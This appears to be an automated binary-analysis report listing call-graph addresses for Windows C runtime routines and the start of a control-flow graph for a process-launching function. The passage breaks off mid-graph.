7ff6b751a948 __free_lconv_num 11 API calls 19685->19690 19687->19674 19688->19692 19689->19676 19694 7ff6b7520de4 19690->19694 19691->19676 19692->19680 19693->19692 19695 7ff6b75233dc 40 API calls 19693->19695 19698 7ff6b75233dc 40 API calls 19694->19698 19700 7ff6b7520dea 19694->19700 19696 7ff6b7520e6c 19695->19696 19697 7ff6b751a948 __free_lconv_num 11 API calls 19696->19697 19699 7ff6b7520e76 19697->19699 19702 7ff6b7520e16 19698->19702 19699->19692 19699->19700 19701 7ff6b7520f2f 19700->19701 19705 7ff6b751eb98 _get_daylight 11 API calls 19700->19705 19704 7ff6b751a948 __free_lconv_num 11 API calls 19701->19704 19703 7ff6b751a948 __free_lconv_num 11 API calls 19702->19703 19703->19700 19704->19686 19706 7ff6b7520ebb 19705->19706 19707 7ff6b7520ecc 19706->19707 19708 7ff6b7520ec3 19706->19708 19710 7ff6b7520474 37 API calls 19707->19710 19709 7ff6b751a948 __free_lconv_num 11 API calls 19708->19709 19711 7ff6b7520eca 19709->19711 19712 7ff6b7520eda 19710->19712 19718 7ff6b751a948 __free_lconv_num 11 API calls 19711->19718 19713 7ff6b7520f6f 19712->19713 19714 7ff6b7520ee2 SetEnvironmentVariableW 19712->19714 19717 7ff6b751a900 _isindst 17 API calls 19713->19717 19715 7ff6b7520f27 19714->19715 19716 7ff6b7520f06 19714->19716 19721 7ff6b751a948 __free_lconv_num 11 API calls 19715->19721 19719 7ff6b7514f08 _get_daylight 11 API calls 19716->19719 19720 7ff6b7520f83 19717->19720 19718->19686 19722 7ff6b7520f0b 19719->19722 19721->19701 19723 7ff6b751a948 __free_lconv_num 11 API calls 19722->19723 19723->19711 19725 7ff6b7520fb9 19724->19725 19726 7ff6b7520fa1 19724->19726 19727 7ff6b751eb98 _get_daylight 11 API calls 19725->19727 19726->19602 19733 7ff6b7520fdd 19727->19733 19728 7ff6b752103e 19730 7ff6b751a948 __free_lconv_num 11 API calls 19728->19730 19729 7ff6b751a504 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19731 7ff6b7521068 19729->19731 19730->19726 19732 7ff6b751eb98 _get_daylight 11 API calls 19732->19733 19733->19728 19733->19732 19734 7ff6b751a948 __free_lconv_num 11 API calls 19733->19734 19735 7ff6b751a4a4 __std_exception_copy 37 API calls 19733->19735 19736 7ff6b752104d 19733->19736 19738 7ff6b7521062 19733->19738 19734->19733 19735->19733 19737 7ff6b751a900 _isindst 17 API calls 19736->19737 19737->19738 19738->19729 19740 7ff6b75196d9 19739->19740 19741 7ff6b75196d0 19739->19741 19740->19615 19740->19616 19741->19740 19854 7ff6b7519198 19741->19854 19746 7ff6b7527139 19745->19746 19747 7ff6b7526254 19745->19747 19749 7ff6b7514f4c 45 API calls 19746->19749 19748 7ff6b7526261 19747->19748 19756 7ff6b7526297 19747->19756 19752 7ff6b7514f08 _get_daylight 11 API calls 19748->19752 19754 7ff6b7526208 19748->19754 19751 7ff6b752716d 19749->19751 19750 7ff6b75262c1 19755 7ff6b7514f08 _get_daylight 11 API calls 19750->19755 19760 7ff6b7527183 19751->19760 19764 7ff6b752719a 19751->19764 19773 7ff6b7527172 19751->19773 19753 7ff6b752626b 19752->19753 19758 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 19753->19758 19754->19622 19759 7ff6b75262c6 19755->19759 19756->19750 19757 7ff6b75262e6 19756->19757 19766 7ff6b7514f4c 45 API calls 19757->19766 19779 7ff6b75262d1 19757->19779 19762 7ff6b7526276 19758->19762 19763 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 19759->19763 19761 7ff6b7514f08 _get_daylight 11 API calls 19760->19761 19765 7ff6b7527188 19761->19765 19762->19622 19763->19779 19767 7ff6b75271b6 19764->19767 19768 7ff6b75271a4 19764->19768 19769 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 19765->19769 19766->19779 19771 7ff6b75271c7 19767->19771 19772 7ff6b75271de 19767->19772 19770 7ff6b7514f08 _get_daylight 11 API calls 19768->19770 19769->19773 19774 7ff6b75271a9 19770->19774 20071 7ff6b75262a4 19771->20071 20080 7ff6b7528f4c 19772->20080 19773->19622 19778 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 19774->19778 19778->19773 19779->19622 19780 7ff6b7514f08 _get_daylight 11 API calls 19780->19773 19782 7ff6b752341b 19781->19782 19783 7ff6b75233fe 19781->19783 19785 7ff6b7523425 19782->19785 20120 7ff6b7527c38 19782->20120 19783->19782 19784 7ff6b752340c 19783->19784 19786 7ff6b7514f08 _get_daylight 11 API calls 19784->19786 20127 7ff6b7527c74 19785->20127 19789 7ff6b7523411 __scrt_get_show_window_mode 19786->19789 19789->19632 19791 7ff6b7514f4c 45 API calls 19790->19791 19792 7ff6b75272aa 19791->19792 19793 7ff6b75272b8 19792->19793 20139 7ff6b751ef24 19792->20139 20142 7ff6b75154ac 19793->20142 19797 7ff6b75273a4 19800 7ff6b75273b5 19797->19800 19801 7ff6b751a948 __free_lconv_num 11 API calls 19797->19801 19798 7ff6b7514f4c 45 API calls 19799 7ff6b7527327 19798->19799 19803 7ff6b751ef24 5 API calls 19799->19803 19806 7ff6b7527330 19799->19806 19802 7ff6b7520ba3 19800->19802 19804 7ff6b751a948 __free_lconv_num 11 API calls 19800->19804 19801->19800 19802->19654 19802->19655 19803->19806 19804->19802 19805 7ff6b75154ac 14 API calls 19807 7ff6b752738b 19805->19807 19806->19805 19807->19797 19808 7ff6b7527393 SetEnvironmentVariableW 19807->19808 19808->19797 19810 7ff6b75210ac 19809->19810 19817 7ff6b752108f 19809->19817 19811 7ff6b751eb98 _get_daylight 11 API calls 19810->19811 19812 7ff6b75210d0 19811->19812 19813 7ff6b7521131 19812->19813 19818 7ff6b751eb98 _get_daylight 11 API calls 19812->19818 19819 7ff6b751a948 __free_lconv_num 11 API calls 19812->19819 19820 7ff6b7520474 37 API calls 19812->19820 19821 7ff6b7521140 19812->19821 19823 7ff6b7521154 19812->19823 19815 7ff6b751a948 __free_lconv_num 11 API calls 19813->19815 19814 7ff6b751a504 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19816 7ff6b752115a 19814->19816 19815->19817 19817->19667 19818->19812 19819->19812 19820->19812 19822 7ff6b751a900 _isindst 17 API calls 19821->19822 19822->19823 19823->19814 19825 7ff6b751970c 19824->19825 19826 7ff6b7519715 19824->19826 19825->19826 20164 7ff6b751920c 19825->20164 19826->19682 19826->19683 19831 7ff6b7526ff9 19830->19831 19836 7ff6b7527026 19830->19836 19832 7ff6b7526ffe 19831->19832 19831->19836 19833 7ff6b7514f08 _get_daylight 11 API calls 19832->19833 19834 7ff6b7527003 19833->19834 19837 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 19834->19837 19835 7ff6b752706a 19839 7ff6b7514f08 _get_daylight 11 API calls 19835->19839 19836->19835 19838 7ff6b7527089 19836->19838 19852 7ff6b752705e __crtLCMapStringW 19836->19852 19840 7ff6b752700e 19837->19840 19841 7ff6b7527093 19838->19841 19842 7ff6b75270a5 19838->19842 19843 7ff6b752706f 19839->19843 19840->19676 19844 7ff6b7514f08 _get_daylight 11 API calls 19841->19844 19845 7ff6b7514f4c 45 API calls 19842->19845 19846 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 19843->19846 19847 7ff6b7527098 19844->19847 19848 7ff6b75270b2 19845->19848 19846->19852 19849 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 19847->19849 19848->19852 20211 7ff6b7528b08 19848->20211 19849->19852 19852->19676 19853 7ff6b7514f08 _get_daylight 11 API calls 19853->19852 19855 7ff6b75191ad 19854->19855 19856 7ff6b75191b1 19854->19856 19855->19740 19869 7ff6b75194ec 19855->19869 19877 7ff6b75225f0 19856->19877 19861 7ff6b75191cf 19903 7ff6b751927c 19861->19903 19862 7ff6b75191c3 19863 7ff6b751a948 __free_lconv_num 11 API calls 19862->19863 19863->19855 19866 7ff6b751a948 __free_lconv_num 11 API calls 19867 7ff6b75191f6 19866->19867 19868 7ff6b751a948 __free_lconv_num 11 API calls 19867->19868 19868->19855 19870 7ff6b7519515 19869->19870 19875 7ff6b751952e 19869->19875 19870->19740 19871 7ff6b75207e8 WideCharToMultiByte 19871->19875 19872 7ff6b751eb98 _get_daylight 11 API calls 19872->19875 19873 7ff6b75195be 19874 7ff6b751a948 __free_lconv_num 11 API calls 19873->19874 19874->19870 19875->19870 19875->19871 19875->19872 19875->19873 19876 7ff6b751a948 __free_lconv_num 11 API calls 19875->19876 19876->19875 19878 7ff6b75191b6 19877->19878 19879 7ff6b75225fd 19877->19879 19883 7ff6b752292c GetEnvironmentStringsW 19878->19883 19922 7ff6b751b224 19879->19922 19884 7ff6b752295c 19883->19884 19885 7ff6b75191bb 19883->19885 19886 7ff6b75207e8 WideCharToMultiByte 19884->19886 19885->19861 19885->19862 19887 7ff6b75229ad 19886->19887 19888 7ff6b75229b4 FreeEnvironmentStringsW 19887->19888 19889 7ff6b751d5fc _fread_nolock 12 API calls 19887->19889 19888->19885 19890 7ff6b75229c7 19889->19890 19891 7ff6b75229d8 19890->19891 19892 7ff6b75229cf 19890->19892 19894 7ff6b75207e8 WideCharToMultiByte 19891->19894 19893 7ff6b751a948 __free_lconv_num 11 API calls 19892->19893 19895 7ff6b75229d6 19893->19895 19896 7ff6b75229fb 19894->19896 19895->19888 19897 7ff6b7522a09 19896->19897 19898 7ff6b75229ff 19896->19898 19900 7ff6b751a948 __free_lconv_num 11 API calls 19897->19900 19899 7ff6b751a948 __free_lconv_num 11 API calls 19898->19899 19901 7ff6b7522a07 FreeEnvironmentStringsW 19899->19901 19900->19901 19901->19885 19904 7ff6b75192a1 19903->19904 19905 7ff6b751eb98 _get_daylight 11 API calls 19904->19905 19911 7ff6b75192d7 19905->19911 19906 7ff6b751a948 __free_lconv_num 11 API calls 19907 7ff6b75191d7 19906->19907 19907->19866 19908 7ff6b7519352 19909 7ff6b751a948 __free_lconv_num 11 API calls 19908->19909 19909->19907 19910 7ff6b751eb98 _get_daylight 11 API calls 19910->19911 19911->19908 19911->19910 19912 7ff6b7519341 19911->19912 19913 7ff6b751a4a4 __std_exception_copy 37 API calls 19911->19913 19916 7ff6b7519377 19911->19916 19919 7ff6b751a948 __free_lconv_num 11 API calls 19911->19919 19920 7ff6b75192df 19911->19920 19914 7ff6b75194a8 11 API calls 19912->19914 19913->19911 19915 7ff6b7519349 19914->19915 19917 7ff6b751a948 __free_lconv_num 11 API calls 19915->19917 19918 7ff6b751a900 _isindst 17 API calls 19916->19918 19917->19920 19921 7ff6b751938a 19918->19921 19919->19911 19920->19906 19923 7ff6b751b250 FlsSetValue 19922->19923 19924 7ff6b751b235 FlsGetValue 19922->19924 19925 7ff6b751b25d 19923->19925 19926 7ff6b751b242 19923->19926 19924->19926 19927 7ff6b751b24a 19924->19927 19929 7ff6b751eb98 _get_daylight 11 API calls 19925->19929 19928 7ff6b751a504 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19926->19928 19930 7ff6b751b248 19926->19930 19927->19923 19931 7ff6b751b2c5 19928->19931 19932 7ff6b751b26c 19929->19932 19942 7ff6b75222c4 19930->19942 19933 7ff6b751b28a FlsSetValue 19932->19933 19934 7ff6b751b27a FlsSetValue 19932->19934 19936 7ff6b751b296 FlsSetValue 19933->19936 19937 7ff6b751b2a8 19933->19937 19935 7ff6b751b283 19934->19935 19938 7ff6b751a948 __free_lconv_num 11 API calls 19935->19938 19936->19935 19939 7ff6b751aef4 _get_daylight 11 API calls 19937->19939 19938->19926 19940 7ff6b751b2b0 19939->19940 19941 7ff6b751a948 __free_lconv_num 11 API calls 19940->19941 19941->19930 19965 7ff6b7522534 19942->19965 19944 7ff6b75222f9 19980 7ff6b7521fc4 19944->19980 19947 7ff6b751d5fc _fread_nolock 12 API calls 19948 7ff6b7522327 19947->19948 19949 7ff6b752232f 19948->19949 19951 7ff6b752233e 19948->19951 19950 7ff6b751a948 __free_lconv_num 11 API calls 19949->19950 19964 7ff6b7522316 19950->19964 19951->19951 19987 7ff6b752266c 19951->19987 19954 7ff6b752243a 19955 7ff6b7514f08 _get_daylight 11 API calls 19954->19955 19957 7ff6b752243f 19955->19957 19956 7ff6b7522495 19959 7ff6b75224fc 19956->19959 19998 7ff6b7521df4 19956->19998 19960 7ff6b751a948 __free_lconv_num 11 API calls 19957->19960 19958 7ff6b7522454 19958->19956 19961 7ff6b751a948 __free_lconv_num 11 API calls 19958->19961 19963 7ff6b751a948 __free_lconv_num 11 API calls 19959->19963 19960->19964 19961->19956 19963->19964 19964->19878 19966 7ff6b7522557 19965->19966 19968 7ff6b7522561 19966->19968 20013 7ff6b75202d8 EnterCriticalSection 19966->20013 19969 7ff6b75225d3 19968->19969 19970 7ff6b751a504 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19968->19970 19969->19944 19974 7ff6b75225eb 19970->19974 19975 7ff6b7522642 19974->19975 19977 7ff6b751b224 50 API calls 19974->19977 19975->19944 19978 7ff6b752262c 19977->19978 19979 7ff6b75222c4 65 API calls 19978->19979 19979->19975 19981 7ff6b7514f4c 45 API calls 19980->19981 19982 7ff6b7521fd8 19981->19982 19983 7ff6b7521ff6 19982->19983 19984 7ff6b7521fe4 GetOEMCP 19982->19984 19985 7ff6b752200b 19983->19985 19986 7ff6b7521ffb GetACP 19983->19986 19984->19985 19985->19947 19985->19964 19986->19985 19988 7ff6b7521fc4 47 API calls 19987->19988 19990 7ff6b7522699 19988->19990 19989 7ff6b75227ef 19991 7ff6b750c550 _log10_special 8 API calls 19989->19991 19990->19989 19992 7ff6b75226d6 IsValidCodePage 19990->19992 19995 7ff6b75226f0 __scrt_get_show_window_mode 19990->19995 19993 7ff6b7522431 19991->19993 19992->19989 19994 7ff6b75226e7 19992->19994 19993->19954 19993->19958 19994->19995 19996 7ff6b7522716 GetCPInfo 19994->19996 20014 7ff6b75220dc 19995->20014 19996->19989 19996->19995 20070 7ff6b75202d8 EnterCriticalSection 19998->20070 20015 7ff6b7522119 GetCPInfo 20014->20015 20016 7ff6b752220f 20014->20016 20015->20016 20021 7ff6b752212c 20015->20021 20017 7ff6b750c550 _log10_special 8 API calls 20016->20017 20019 7ff6b75222ae 20017->20019 20018 7ff6b7522e40 48 API calls 20020 7ff6b75221a3 20018->20020 20019->19989 20025 7ff6b7527b84 20020->20025 20021->20018 20024 7ff6b7527b84 54 API calls 20024->20016 20026 7ff6b7514f4c 45 API calls 20025->20026 20027 7ff6b7527ba9 20026->20027 20030 7ff6b7527850 20027->20030 20031 7ff6b7527891 20030->20031 20032 7ff6b751f8a0 _fread_nolock MultiByteToWideChar 20031->20032 20035 7ff6b75278db 20032->20035 20033 7ff6b7527b59 20034 7ff6b750c550 _log10_special 8 API calls 20033->20034 20036 7ff6b75221d6 20034->20036 20035->20033 20037 7ff6b751d5fc _fread_nolock 12 API calls 20035->20037 20038 7ff6b7527a11 20035->20038 20040 7ff6b7527913 20035->20040 20036->20024 20037->20040 20038->20033 20039 7ff6b751a948 __free_lconv_num 11 API calls 20038->20039 20039->20033 20040->20038 20041 7ff6b751f8a0 _fread_nolock MultiByteToWideChar 20040->20041 20042 7ff6b7527986 20041->20042 20042->20038 20061 7ff6b751f0e4 20042->20061 20045 7ff6b75279d1 20045->20038 20048 7ff6b751f0e4 __crtLCMapStringW 6 API calls 20045->20048 20046 7ff6b7527a22 20047 7ff6b751d5fc _fread_nolock 12 API calls 20046->20047 20049 7ff6b7527af4 20046->20049 20050 7ff6b7527a40 20046->20050 20047->20050 20048->20038 20049->20038 20051 7ff6b751a948 __free_lconv_num 11 API calls 20049->20051 20050->20038 20052 7ff6b751f0e4 __crtLCMapStringW 6 API calls 20050->20052 20051->20038 20053 7ff6b7527ac0 20052->20053 20053->20049 20054 7ff6b7527af6 20053->20054 20055 7ff6b7527ae0 20053->20055 20057 7ff6b75207e8 WideCharToMultiByte 20054->20057 20056 7ff6b75207e8 WideCharToMultiByte 20055->20056 20058 7ff6b7527aee 20056->20058 20057->20058 20058->20049 20059 7ff6b7527b0e 20058->20059 20059->20038 20060 7ff6b751a948 __free_lconv_num 11 API calls 20059->20060 20060->20038 20062 7ff6b751ed10 __crtLCMapStringW 5 API calls 20061->20062 20063 7ff6b751f122 20062->20063 20064 7ff6b751f12a 20063->20064 20067 7ff6b751f1d0 20063->20067 20064->20038 20064->20045 20064->20046 20066 7ff6b751f193 LCMapStringW 20066->20064 20068 7ff6b751ed10 __crtLCMapStringW 5 API calls 20067->20068 20069 7ff6b751f1fe __crtLCMapStringW 20068->20069 20069->20066 20072 7ff6b75262d8 20071->20072 20073 7ff6b75262c1 20071->20073 20072->20073 20075 7ff6b75262e6 20072->20075 20074 7ff6b7514f08 _get_daylight 11 API calls 20073->20074 20076 7ff6b75262c6 20074->20076 20077 7ff6b75262d1 20075->20077 20079 7ff6b7514f4c 45 API calls 20075->20079 20078 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 20076->20078 20077->19773 20078->20077 20079->20077 20081 7ff6b7514f4c 45 API calls 20080->20081 20082 7ff6b7528f71 20081->20082 20085 7ff6b7528bc8 20082->20085 20089 7ff6b7528c16 20085->20089 20086 7ff6b750c550 _log10_special 8 API calls 20087 7ff6b7527205 20086->20087 20087->19773 20087->19780 20088 7ff6b7528c9d 20090 7ff6b751f8a0 _fread_nolock MultiByteToWideChar 20088->20090 20094 7ff6b7528ca1 20088->20094 20089->20088 20091 7ff6b7528c88 GetCPInfo 20089->20091 20089->20094 20092 7ff6b7528d35 20090->20092 20091->20088 20091->20094 20093 7ff6b751d5fc _fread_nolock 12 API calls 20092->20093 20092->20094 20095 7ff6b7528d6c 20092->20095 20093->20095 20094->20086 20095->20094 20096 7ff6b751f8a0 _fread_nolock MultiByteToWideChar 20095->20096 20097 7ff6b7528dda 20096->20097 20098 7ff6b7528ebc 20097->20098 20099 7ff6b751f8a0 _fread_nolock MultiByteToWideChar 20097->20099 20098->20094 20100 7ff6b751a948 __free_lconv_num 11 API calls 20098->20100 20101 7ff6b7528e00 20099->20101 20100->20094 20101->20098 20102 7ff6b751d5fc _fread_nolock 12 API calls 20101->20102 20103 7ff6b7528e2d 20101->20103 20102->20103 20103->20098 20104 7ff6b751f8a0 _fread_nolock MultiByteToWideChar 20103->20104 20105 7ff6b7528ea4 20104->20105 20106 7ff6b7528eaa 20105->20106 20107 7ff6b7528ec4 20105->20107 20106->20098 20110 7ff6b751a948 __free_lconv_num 11 API calls 20106->20110 20114 7ff6b751ef68 20107->20114 20110->20098 20111 7ff6b7528f03 20111->20094 20113 7ff6b751a948 __free_lconv_num 11 API calls 20111->20113 20112 7ff6b751a948 __free_lconv_num 11 API calls 20112->20111 20113->20094 20115 7ff6b751ed10 __crtLCMapStringW 5 API calls 20114->20115 20116 7ff6b751efa6 20115->20116 20117 7ff6b751efae 20116->20117 20118 7ff6b751f1d0 __crtLCMapStringW 5 API calls 20116->20118 20117->20111 20117->20112 20119 7ff6b751f017 CompareStringW 20118->20119 20119->20117 20121 7ff6b7527c5a HeapSize 20120->20121 20122 7ff6b7527c41 20120->20122 20123 7ff6b7514f08 _get_daylight 11 API calls 20122->20123 20124 7ff6b7527c46 20123->20124 20125 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 20124->20125 20126 7ff6b7527c51 20125->20126 20126->19785 20128 7ff6b7527c89 20127->20128 20129 7ff6b7527c93 20127->20129 20130 7ff6b751d5fc _fread_nolock 12 API calls 20128->20130 20131 7ff6b7527c98 20129->20131 20132 7ff6b7527c9f _get_daylight 20129->20132 20136 7ff6b7527c91 20130->20136 20133 7ff6b751a948 __free_lconv_num 11 API calls 20131->20133 20134 7ff6b7527cd2 HeapReAlloc 20132->20134 20135 7ff6b7527ca5 20132->20135 20138 7ff6b7523590 _get_daylight 2 API calls 20132->20138 20133->20136 20134->20132 20134->20136 20137 7ff6b7514f08 _get_daylight 11 API calls 20135->20137 20136->19789 20137->20136 20138->20132 20140 7ff6b751ed10 __crtLCMapStringW 5 API calls 20139->20140 20141 7ff6b751ef44 20140->20141 20141->19793 20143 7ff6b75154d6 20142->20143 20144 7ff6b75154fa 20142->20144 20148 7ff6b751a948 __free_lconv_num 11 API calls 20143->20148 20151 7ff6b75154e5 20143->20151 20145 7ff6b75154ff 20144->20145 20146 7ff6b7515554 20144->20146 20149 7ff6b7515514 20145->20149 20145->20151 20152 7ff6b751a948 __free_lconv_num 11 API calls 20145->20152 20147 7ff6b751f8a0 _fread_nolock MultiByteToWideChar 20146->20147 20158 7ff6b7515570 20147->20158 20148->20151 20153 7ff6b751d5fc _fread_nolock 12 API calls 20149->20153 20150 7ff6b7515577 GetLastError 20154 7ff6b7514e7c _fread_nolock 11 API calls 20150->20154 20151->19797 20151->19798 20152->20149 20153->20151 20156 7ff6b7515584 20154->20156 20155 7ff6b75155b2 20155->20151 20159 7ff6b751f8a0 _fread_nolock MultiByteToWideChar 20155->20159 20160 7ff6b7514f08 _get_daylight 11 API calls 20156->20160 20157 7ff6b75155a5 20162 7ff6b751d5fc _fread_nolock 12 API calls 20157->20162 20158->20150 20158->20155 20158->20157 20161 7ff6b751a948 __free_lconv_num 11 API calls 20158->20161 20163 7ff6b75155f6 20159->20163 20160->20151 20161->20157 20162->20155 20163->20150 20163->20151 20165 7ff6b7519221 20164->20165 20166 7ff6b7519225 20164->20166 20165->19826 20177 7ff6b75195cc 20165->20177 20185 7ff6b7522a3c GetEnvironmentStringsW 20166->20185 20169 7ff6b751923e 20192 7ff6b751938c 20169->20192 20170 7ff6b7519232 20172 7ff6b751a948 __free_lconv_num 11 API calls 20170->20172 20172->20165 20174 7ff6b751a948 __free_lconv_num 11 API calls 20175 7ff6b7519265 20174->20175 20176 7ff6b751a948 __free_lconv_num 11 API calls 20175->20176 20176->20165 20178 7ff6b75195ef 20177->20178 20183 7ff6b7519606 20177->20183 20178->19826 20179 7ff6b751eb98 _get_daylight 11 API calls 20179->20183 20180 7ff6b751967a 20182 7ff6b751a948 __free_lconv_num 11 API calls 20180->20182 20181 7ff6b751f8a0 MultiByteToWideChar _fread_nolock 20181->20183 20182->20178 20183->20178 20183->20179 20183->20180 20183->20181 20184 7ff6b751a948 __free_lconv_num 11 API calls 20183->20184 20184->20183 20186 7ff6b7522a60 20185->20186 20187 7ff6b751922a 20185->20187 20188 7ff6b751d5fc _fread_nolock 12 API calls 20186->20188 20187->20169 20187->20170 20191 7ff6b7522a97 memcpy_s 20188->20191 20189 7ff6b751a948 __free_lconv_num 11 API calls 20190 7ff6b7522ab7 FreeEnvironmentStringsW 20189->20190 20190->20187 20191->20189 20193 7ff6b75193b4 20192->20193 20194 7ff6b751eb98 _get_daylight 11 API calls 20193->20194 20205 7ff6b75193ef 20194->20205 20195 7ff6b75193f7 20196 7ff6b751a948 __free_lconv_num 11 API calls 20195->20196 20197 7ff6b7519246 20196->20197 20197->20174 20198 7ff6b7519471 20199 7ff6b751a948 __free_lconv_num 11 API calls 20198->20199 20199->20197 20200 7ff6b751eb98 _get_daylight 11 API calls 20200->20205 20201 7ff6b7519460 20203 7ff6b75194a8 11 API calls 20201->20203 20202 7ff6b7520474 37 API calls 20202->20205 20204 7ff6b7519468 20203->20204 20207 7ff6b751a948 __free_lconv_num 11 API calls 20204->20207 20205->20195 20205->20198 20205->20200 20205->20201 20205->20202 20206 7ff6b7519494 20205->20206 20209 7ff6b751a948 __free_lconv_num 11 API calls 20205->20209 20208 7ff6b751a900 _isindst 17 API calls 20206->20208 20207->20195 20210 7ff6b75194a6 20208->20210 20209->20205 20213 7ff6b7528b31 __crtLCMapStringW 20211->20213 20212 7ff6b75270ee 20212->19852 20212->19853 20213->20212 20214 7ff6b751ef68 6 API calls 20213->20214 20214->20212 20370 7ff6b750cb50 20371 7ff6b750cb60 20370->20371 20387 7ff6b7519ba8 20371->20387 20373 7ff6b750cb6c 20393 7ff6b750ce48 20373->20393 20375 7ff6b750d12c 7 API calls 20377 7ff6b750cc05 20375->20377 20376 7ff6b750cb84 _RTC_Initialize 20385 7ff6b750cbd9 20376->20385 20398 7ff6b750cff8 20376->20398 20379 7ff6b750cb99 20401 7ff6b7519014 20379->20401 20385->20375 20386 7ff6b750cbf5 20385->20386 20388 7ff6b7519bb9 20387->20388 20389 7ff6b7519bc1 20388->20389 20390 7ff6b7514f08 _get_daylight 11 API calls 20388->20390 20389->20373 20391 7ff6b7519bd0 20390->20391 20392 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 20391->20392 20392->20389 20394 7ff6b750ce59 20393->20394 20397 7ff6b750ce5e __scrt_release_startup_lock 20393->20397 20395 7ff6b750d12c 7 API calls 20394->20395 20394->20397 20396 7ff6b750ced2 20395->20396 20397->20376 20426 7ff6b750cfbc 20398->20426 20400 7ff6b750d001 20400->20379 20402 7ff6b7519034 20401->20402 20416 7ff6b750cba5 20401->20416 20403 7ff6b751903c 20402->20403 20404 7ff6b7519052 GetModuleFileNameW 20402->20404 20405 7ff6b7514f08 _get_daylight 11 API calls 20403->20405 20408 7ff6b751907d 20404->20408 20406 7ff6b7519041 20405->20406 20407 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 20406->20407 20407->20416 20409 7ff6b7518fb4 11 API calls 20408->20409 20410 7ff6b75190bd 20409->20410 20411 7ff6b75190c5 20410->20411 20415 7ff6b75190dd 20410->20415 20412 7ff6b7514f08 _get_daylight 11 API calls 20411->20412 20413 7ff6b75190ca 20412->20413 20414 7ff6b751a948 __free_lconv_num 11 API calls 20413->20414 20414->20416 20418 7ff6b751912b 20415->20418 20420 7ff6b7519144 20415->20420 20423 7ff6b75190ff 20415->20423 20416->20385 20425 7ff6b750d0cc InitializeSListHead 20416->20425 20417 7ff6b751a948 __free_lconv_num 11 API calls 20417->20416 20419 7ff6b751a948 __free_lconv_num 11 API calls 20418->20419 20422 7ff6b7519134 20419->20422 20420->20420 20421 7ff6b751a948 __free_lconv_num 11 API calls 20420->20421 20421->20423 20424 7ff6b751a948 __free_lconv_num 11 API calls 20422->20424 20423->20417 20424->20416 20427 7ff6b750cfd6 20426->20427 20429 7ff6b750cfcf 20426->20429 20430 7ff6b751a1ec 20427->20430 20429->20400 20433 7ff6b7519e28 20430->20433 20440 7ff6b75202d8 EnterCriticalSection 20433->20440 20441 7ff6b7519d50 20444 7ff6b7519ccc 20441->20444 20451 7ff6b75202d8 EnterCriticalSection 20444->20451 20621 7ff6b751afd0 20622 7ff6b751afea 20621->20622 20623 7ff6b751afd5 20621->20623 20627 7ff6b751aff0 20623->20627 20628 7ff6b751b03a 20627->20628 20629 7ff6b751b032 20627->20629 20631 7ff6b751a948 __free_lconv_num 11 API calls 20628->20631 20630 7ff6b751a948 __free_lconv_num 11 API calls 20629->20630 20630->20628 20632 7ff6b751b047 20631->20632 20633 7ff6b751a948 __free_lconv_num 11 API calls 20632->20633 20634 7ff6b751b054 20633->20634 20635 7ff6b751a948 __free_lconv_num 11 API calls 20634->20635 20636 7ff6b751b061 20635->20636 20637 7ff6b751a948 __free_lconv_num 11 API calls 20636->20637 20638 7ff6b751b06e 20637->20638 20639 7ff6b751a948 __free_lconv_num 11 API calls 20638->20639 20640 7ff6b751b07b 20639->20640 20641 7ff6b751a948 __free_lconv_num 11 API calls 20640->20641 20642 7ff6b751b088 20641->20642 20643 7ff6b751a948 __free_lconv_num 11 API calls 20642->20643 20644 7ff6b751b095 20643->20644 20645 7ff6b751a948 __free_lconv_num 11 API calls 20644->20645 20646 7ff6b751b0a5 20645->20646 20647 7ff6b751a948 __free_lconv_num 11 API calls 20646->20647 20648 7ff6b751b0b5 20647->20648 20653 7ff6b751ae94 20648->20653 20667 7ff6b75202d8 EnterCriticalSection 20653->20667

                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                              Function 00007FF6B75089E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 0 7ff6b75089e0-7ff6b7508b26 call 7ff6b750c850 call 7ff6b7509390 SetConsoleCtrlHandler GetStartupInfoW call 7ff6b75153f0 call 7ff6b751a47c call 7ff6b751871c call 7ff6b75153f0 call 7ff6b751a47c call 7ff6b751871c call 7ff6b75153f0 call 7ff6b751a47c call 7ff6b751871c GetCommandLineW CreateProcessW 23 7ff6b7508b28-7ff6b7508b48 GetLastError call 7ff6b7502c50 0->23 24 7ff6b7508b4d-7ff6b7508b89 RegisterClassW 0->24 31 7ff6b7508e39-7ff6b7508e5f call 7ff6b750c550 23->31 26 7ff6b7508b8b GetLastError 24->26 27 7ff6b7508b91-7ff6b7508be5 CreateWindowExW 24->27 26->27 29 7ff6b7508be7-7ff6b7508bed GetLastError 27->29 30 7ff6b7508bef-7ff6b7508bf4 ShowWindow 27->30 32 7ff6b7508bfa-7ff6b7508c0a WaitForSingleObject 29->32 30->32 34 7ff6b7508c88-7ff6b7508c8f 32->34 35 7ff6b7508c0c 32->35 36 7ff6b7508c91-7ff6b7508ca1 WaitForSingleObject 34->36 37 7ff6b7508cd2-7ff6b7508cd9 34->37 39 7ff6b7508c10-7ff6b7508c13 35->39 40 7ff6b7508ca7-7ff6b7508cb7 TerminateProcess 36->40 41 7ff6b7508df8-7ff6b7508e02 36->41 42 7ff6b7508cdf-7ff6b7508cf5 QueryPerformanceFrequency QueryPerformanceCounter 37->42 43 7ff6b7508dc0-7ff6b7508dd9 GetMessageW 37->43 44 7ff6b7508c1b-7ff6b7508c22 39->44 45 7ff6b7508c15 GetLastError 39->45 48 7ff6b7508cb9 GetLastError 40->48 49 